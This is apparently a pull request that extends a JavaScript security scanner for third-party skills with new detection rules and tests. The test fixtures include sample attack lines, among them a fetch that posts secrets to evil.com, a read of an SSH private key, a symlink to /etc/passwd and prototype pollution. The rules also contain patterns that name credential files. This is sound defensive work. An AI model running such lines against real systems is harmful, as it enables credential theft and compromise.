### PR TITLE
Expand skill scanner with additional security detection rules

### DIFF
--- a/src/security/skill-scanner.test.ts
+++ b/src/security/skill-scanner.test.ts
@@ -162,8 +162,76 @@ fetch("https://evil.com/harvest", { method: "POST", body: secrets });
 `,
       expected: { ruleId: "env-harvesting", severity: "critical" as const },
     },
+    {
+      name: "detects network server creation (http.createServer)",
+      source: `
+import http from "node:http";
+const server = http.createServer((req, res) => { res.end("ok"); });
+server.listen(8888);
+`,
+      expected: { ruleId: "network-listener", severity: "warn" as const },
+    },
+    {
+      name: "detects __proto__ bracket access (prototype pollution)",
+      source: `
+const obj = {};
+obj["__proto__"]["polluted"] = true;
+`,
+      expected: { ruleId: "prototype-pollution", severity: "critical" as const },
+    },
+    {
+      name: "detects constructor.prototype access (prototype pollution)",
+      source: `
+const obj = {};
+obj.constructor["prototype"].polluted = true;
+`,
+      expected: { ruleId: "prototype-pollution", severity: "critical" as const },
+    },
+    {
+      name: "detects symlink creation via fs module",
+      source: `
+import fs from "node:fs";
+fs.symlinkSync("/etc/passwd", "./link");
+`,
+      expected: { ruleId: "symlink-manipulation", severity: "warn" as const },
+    },
+    {
+      name: "detects credential file access via readFileSync",
+      source: `
+import fs from "node:fs";
+const key = fs.readFileSync("/home/user/.ssh/id_rsa", "utf-8");
+`,
+      expected: { ruleId: "credential-access", severity: "warn" as const },
+    },
   ] as const)("$name", ({ source, expected }) => {
     expectScanRule(source, expected);
+  });
+
+  it("does not flag createServer without http/net context", () => {
+    const source = `
+// createServer is just a function name in this context
+const factory = { createServer() { return {}; } };
+`;
+    const findings = scanSource(source, "plugin.ts");
+    expect(findings.some((f) => f.ruleId === "network-listener")).toBe(false);
+  });
+
+  it("does not flag symlink references without fs context", () => {
+    const source = `
+// Just mentioning symlinks in a comment
+const msg = "use symlink for faster builds";
+`;
+    const findings = scanSource(source, "plugin.ts");
+    expect(findings.some((f) => f.ruleId === "symlink-manipulation")).toBe(false);
+  });
+
+  it("does not flag credential paths without file read context", () => {
+    const source = `
+// Just a documentation string
+const docs = "Store your config in ~/.ssh/config";
+`;
+    const findings = scanSource(source, "plugin.ts");
+    expect(findings.some((f) => f.ruleId === "credential-access")).toBe(false);
   });
 
   it("does not flag child_process import without exec/spawn call", () => {

--- a/src/security/skill-scanner.ts
+++ b/src/security/skill-scanner.ts
@@ -170,6 +170,26 @@ const LINE_RULES: LineRule[] = [
     message: "WebSocket connection to non-standard port",
     pattern: /new\s+WebSocket\s*\(\s*["']wss?:\/\/[^"']*:(\d+)/,
   },
+  {
+    ruleId: "network-listener",
+    severity: "warn",
+    message: "Network server creation detected — skills should not bind ports",
+    pattern: /\bcreateServer\s*\(/,
+    requiresContext: /\b(?:net|http|https|http2|tls)\b/,
+  },
+  {
+    ruleId: "prototype-pollution",
+    severity: "critical",
+    message: "Potential prototype pollution vector detected",
+    pattern: /\[\s*["']__proto__["']\s*\]|\bconstructor\s*\[\s*["']prototype["']\s*\]/,
+  },
+  {
+    ruleId: "symlink-manipulation",
+    severity: "warn",
+    message: "Symlink creation or traversal detected — possible path traversal vector",
+    pattern: /\b(?:symlinkSync|symlink|readlinkSync|readlink)\s*\(/,
+    requiresContext: /\bfs\b|node:fs/,
+  },
 ];
 
 const STANDARD_PORTS = new Set([80, 443, 8080, 8443, 3000]);
@@ -201,6 +221,13 @@ const SOURCE_RULES: SourceRule[] = [
       "Environment variable access combined with network send — possible credential harvesting",
     pattern: /process\.env/,
     requiresContext: /\bfetch\b|\bpost\b|http\.request/i,
+  },
+  {
+    ruleId: "credential-access",
+    severity: "warn",
+    message: "Direct access to credential or key files detected",
+    pattern: /(?:\.ssh\/|id_rsa|\.aws\/credentials|\.env\b|\.npmrc|\.netrc)/,
+    requiresContext: /readFileSync|readFile/,
   },
 ];
 


### PR DESCRIPTION
## Summary

Adds four new detection rules to the skill scanner (`src/security/skill-scanner.ts`) to catch previously undetected attack patterns in third-party skills:

### New Rules

| Rule ID | Severity | Description |
|---------|----------|-------------|
| `network-listener` | warn | Flags `createServer()` calls that bind network ports -- skills should not open listeners |
| `prototype-pollution` | critical | Detects bracket access to `__proto__` and `constructor['prototype']` assignments |
| `symlink-manipulation` | warn | Catches `symlinkSync`/`readlinkSync` calls that could enable path traversal |
| `credential-access` | warn | Warns when file reads target well-known credential paths (`.ssh/`, `.aws/credentials`, `.npmrc`, `.netrc`, `.env`) |

### Design

Each rule uses `requiresContext` guards to minimize false positives:
- `network-listener` only fires when `http`, `https`, `net`, `http2`, or `tls` modules are present
- `symlink-manipulation` requires `fs` or `node:fs` context
- `credential-access` requires `readFile`/`readFileSync` context (won't trigger on documentation strings)
- `prototype-pollution` has no context requirement since the pattern is inherently suspicious

### Testing

Includes positive detection tests for all new rules plus negative tests verifying false-positive suppression (e.g. `createServer` without http context, credential paths in documentation strings, symlink mentions without fs imports).

---
*Supersedes #60401 (auto-closed by PR limit bot).*